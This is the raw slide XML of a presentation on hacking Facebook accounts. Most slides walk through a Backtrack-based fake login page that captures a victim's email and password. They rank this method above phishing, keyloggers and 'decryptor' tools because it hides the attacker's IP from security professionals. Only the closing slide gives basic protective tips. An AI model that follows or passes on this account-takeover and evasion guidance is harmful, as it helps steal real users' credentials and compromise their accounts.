              </a:rPr>
              <a:t>redirect to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login page.</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Now Enter your anything to check it will work or not.</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For Example: I use</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r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>technodarshini2k13@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>letshackthis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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And Press Enter. Let see what happen on the Next step.</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pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138545" y="169875"/>
            <a:ext cx="4572000" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>7)    Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>paste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> address to address bar of your browser to open browser in backtrack click applications then internet and select browser now the browser will be opened.</a:t>
            </a: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1092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Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152401" y="0"/>
            <a:ext cx="9026236" cy="7294305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1846263" algn="l"/>
                <a:tab pos="2971800" algn="ctr"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Comparing the above methods:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In the above defined 5 methods of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hacking the last method using Backtrack 5 OS is the best one.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reasons:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Compared to phishing method it is more secured and anonymous method to hack others </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>accounts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>When compared to usage of Google dorks list, it is much efficient as it hides your identity i.e. your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> address as backtrack creates or quickly changes its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> address from time to time to save you from cyber security professionals or being tracked and keeps you anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>When compared with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hacking decryptor software, you cannot easily find or download this software from internet as you have to pass by irritating </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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1846263" algn="l"/>
                <a:tab pos="2971800" algn="ctr"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Surveys to download it, while Backtrack 5 is an open source OS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>When compared with key loggers, in which you have to install it in victim’s pc to hack his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>account. In Backtrack there is no need to install anything in victim’s pc, only you have to install OS in your own pc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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76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Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="152400"/>
            <a:ext cx="8458199" cy="6801862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1846263" algn="l"/>
                <a:tab pos="2971800" algn="ctr"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tips to save you from hackers on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Always try to open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mode; it will make your session more secure.</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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t reveal your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>passwords to anyone.</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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is better to install a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>good antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> like Quick heal or MacAfee to save your pc from USB threats and malwares.</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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Make your account setting such that you are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>visible only to you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> or your friends, but not public.</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000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>t use any malware type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>apps or games on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>which access your username and password.</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buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1846263" algn="l"/>
                <a:tab pos="2971800" algn="ctr"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
